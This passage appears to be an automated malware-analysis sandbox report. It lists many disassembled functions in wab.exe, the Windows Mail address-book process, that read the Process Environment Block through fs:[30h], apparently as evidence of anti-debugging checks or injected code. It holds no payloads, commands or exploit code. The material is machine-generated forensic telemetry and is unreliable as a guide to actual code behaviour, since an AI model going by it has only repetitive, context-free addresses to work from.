Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F50D9 mov eax, dword ptr fs:[00000030h] 20_2_224F50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224490DB mov eax, dword ptr fs:[00000030h] 20_2_224490DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224450E4 mov eax, dword ptr fs:[00000030h] 20_2_224450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224450E4 mov ecx, dword ptr fs:[00000030h] 20_2_224450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A0E3 mov ecx, dword ptr fs:[00000030h] 20_2_2241A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A60E0 mov eax, dword ptr fs:[00000030h] 20_2_224A60E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224280E9 mov eax, dword ptr fs:[00000030h] 20_2_224280E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C0F0 mov eax, dword ptr fs:[00000030h] 20_2_2241C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224620F0 mov ecx, dword ptr fs:[00000030h] 20_2_224620F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242208A mov eax, dword ptr fs:[00000030h] 20_2_2242208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h] 20_2_224AD080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AD080 mov eax, dword ptr fs:[00000030h] 20_2_224AD080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D08D mov eax, dword ptr fs:[00000030h] 20_2_2241D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22425096 mov eax, dword ptr fs:[00000030h] 20_2_22425096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h] 20_2_2244D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D090 mov eax, dword ptr fs:[00000030h] 20_2_2244D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245909C mov eax, dword ptr fs:[00000030h] 20_2_2245909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B80A8 mov eax, dword ptr fs:[00000030h] 20_2_224B80A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E60B8 mov eax, dword ptr fs:[00000030h] 20_2_224E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E60B8 mov ecx, dword ptr fs:[00000030h] 20_2_224E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419148 mov eax, dword ptr fs:[00000030h] 20_2_22419148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov ecx, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B4144 mov eax, dword ptr fs:[00000030h] 20_2_224B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427152 mov eax, dword ptr fs:[00000030h] 20_2_22427152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B8158 mov eax, dword ptr fs:[00000030h] 20_2_224B8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426154 mov eax, dword ptr fs:[00000030h] 20_2_22426154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22426154 mov eax, dword ptr fs:[00000030h] 20_2_22426154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C156 mov eax, dword ptr fs:[00000030h] 20_2_2241C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5152 mov eax, dword ptr fs:[00000030h] 20_2_224F5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B9179 mov eax, dword ptr fs:[00000030h] 20_2_224B9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 mov eax, dword ptr fs:[00000030h] 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov ecx, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 mov eax, dword ptr fs:[00000030h] 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E0115 mov eax, dword ptr fs:[00000030h] 20_2_224E0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450124 mov eax, dword ptr fs:[00000030h] 20_2_22450124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421131 mov eax, dword ptr fs:[00000030h] 20_2_22421131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421131 mov eax, dword ptr fs:[00000030h] 20_2_22421131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h] 20_2_2241B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h] 20_2_2241B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h] 20_2_2241B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B136 mov eax, dword ptr fs:[00000030h] 20_2_2241B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F51CB mov eax, dword ptr fs:[00000030h] 20_2_224F51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E61C3 mov eax, dword ptr fs:[00000030h] 20_2_224E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E61C3 mov eax, dword ptr fs:[00000030h] 20_2_224E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245D1D0 mov eax, dword ptr fs:[00000030h] 20_2_2245D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245D1D0 mov ecx, dword ptr fs:[00000030h] 20_2_2245D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov ecx, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E1D0 mov eax, dword ptr fs:[00000030h] 20_2_2249E1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F61E5 mov eax, dword ptr fs:[00000030h] 20_2_224F61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224451EF mov eax, dword ptr fs:[00000030h] 20_2_224451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224251ED mov eax, dword ptr fs:[00000030h] 20_2_224251ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C71F9 mov esi, dword ptr fs:[00000030h] 20_2_224C71F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224501F8 mov eax, dword ptr fs:[00000030h] 20_2_224501F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22460185 mov eax, dword ptr fs:[00000030h] 20_2_22460185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DC188 mov eax, dword ptr fs:[00000030h] 20_2_224DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DC188 mov eax, dword ptr fs:[00000030h] 20_2_224DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A019F mov eax, dword ptr fs:[00000030h] 20_2_224A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A019F mov eax, dword ptr fs:[00000030h] 20_2_224A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A019F mov eax, dword ptr fs:[00000030h] 20_2_224A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A019F mov eax, dword ptr fs:[00000030h] 20_2_224A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h] 20_2_2241A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h] 20_2_2241A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A197 mov eax, dword ptr fs:[00000030h] 20_2_2241A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22477190 mov eax, dword ptr fs:[00000030h] 20_2_22477190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h] 20_2_224D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h] 20_2_224D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h] 20_2_224D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D11A4 mov eax, dword ptr fs:[00000030h] 20_2_224D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243B1B0 mov eax, dword ptr fs:[00000030h] 20_2_2243B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243C640 mov eax, dword ptr fs:[00000030h] 20_2_2243C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E866E mov eax, dword ptr fs:[00000030h] 20_2_224E866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E866E mov eax, dword ptr fs:[00000030h] 20_2_224E866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A660 mov eax, dword ptr fs:[00000030h] 20_2_2245A660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A660 mov eax, dword ptr fs:[00000030h] 20_2_2245A660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22459660 mov eax, dword ptr fs:[00000030h] 20_2_22459660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22459660 mov eax, dword ptr fs:[00000030h] 20_2_22459660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22452674 mov eax, dword ptr fs:[00000030h] 20_2_22452674
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E609 mov eax, dword ptr fs:[00000030h] 20_2_2249E609
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22451607 mov eax, dword ptr fs:[00000030h] 20_2_22451607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245F603 mov eax, dword ptr fs:[00000030h] 20_2_2245F603
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243260B mov eax, dword ptr fs:[00000030h] 20_2_2243260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22423616 mov eax, dword ptr fs:[00000030h] 20_2_22423616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22423616 mov eax, dword ptr fs:[00000030h] 20_2_22423616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462619 mov eax, dword ptr fs:[00000030h] 20_2_22462619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E627 mov eax, dword ptr fs:[00000030h] 20_2_2243E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22456620 mov eax, dword ptr fs:[00000030h] 20_2_22456620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22458620 mov eax, dword ptr fs:[00000030h] 20_2_22458620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F626 mov eax, dword ptr fs:[00000030h] 20_2_2241F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242262C mov eax, dword ptr fs:[00000030h] 20_2_2242262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5636 mov eax, dword ptr fs:[00000030h] 20_2_224F5636
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242B6C0 mov eax, dword ptr fs:[00000030h] 20_2_2242B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A6C7 mov ebx, dword ptr fs:[00000030h] 20_2_2245A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A6C7 mov eax, dword ptr fs:[00000030h] 20_2_2245A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h] 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h] 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h] 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC mov eax, dword ptr fs:[00000030h] 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF6C7 mov eax, dword ptr fs:[00000030h] 20_2_224DF6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224516CF mov eax, dword ptr fs:[00000030h] 20_2_224516CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D6E0 mov eax, dword ptr fs:[00000030h] 20_2_2244D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244D6E0 mov eax, dword ptr fs:[00000030h] 20_2_2244D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B36EE mov eax, dword ptr fs:[00000030h] 20_2_224B36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224536EF mov eax, dword ptr fs:[00000030h] 20_2_224536EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h] 20_2_2249E6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h] 20_2_2249E6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h] 20_2_2249E6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249E6F2 mov eax, dword ptr fs:[00000030h] 20_2_2249E6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A06F1 mov eax, dword ptr fs:[00000030h] 20_2_224A06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A06F1 mov eax, dword ptr fs:[00000030h] 20_2_224A06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DD6F0 mov eax, dword ptr fs:[00000030h] 20_2_224DD6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A368C mov eax, dword ptr fs:[00000030h] 20_2_224A368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A368C mov eax, dword ptr fs:[00000030h] 20_2_224A368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A368C mov eax, dword ptr fs:[00000030h] 20_2_224A368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A368C mov eax, dword ptr fs:[00000030h] 20_2_224A368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424690 mov eax, dword ptr fs:[00000030h] 20_2_22424690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22424690 mov eax, dword ptr fs:[00000030h] 20_2_22424690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245C6A6 mov eax, dword ptr fs:[00000030h] 20_2_2245C6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D6AA mov eax, dword ptr fs:[00000030h] 20_2_2241D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D6AA mov eax, dword ptr fs:[00000030h] 20_2_2241D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h] 20_2_224176B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h] 20_2_224176B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h] 20_2_224176B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224566B0 mov eax, dword ptr fs:[00000030h] 20_2_224566B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433740 mov eax, dword ptr fs:[00000030h] 20_2_22433740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433740 mov eax, dword ptr fs:[00000030h] 20_2_22433740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433740 mov eax, dword ptr fs:[00000030h] 20_2_22433740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F3749 mov eax, dword ptr fs:[00000030h] 20_2_224F3749
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245674D mov esi, dword ptr fs:[00000030h] 20_2_2245674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245674D mov eax, dword ptr fs:[00000030h] 20_2_2245674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245674D mov eax, dword ptr fs:[00000030h] 20_2_2245674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420750 mov eax, dword ptr fs:[00000030h] 20_2_22420750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462750 mov eax, dword ptr fs:[00000030h] 20_2_22462750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462750 mov eax, dword ptr fs:[00000030h] 20_2_22462750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224AE75D mov eax, dword ptr fs:[00000030h] 20_2_224AE75D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4755 mov eax, dword ptr fs:[00000030h] 20_2_224A4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h] 20_2_2241B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h] 20_2_2241B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h] 20_2_2241B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h] 20_2_2241B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22428770 mov eax, dword ptr fs:[00000030h] 20_2_22428770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 mov eax, dword ptr fs:[00000030h] 20_2_22430770
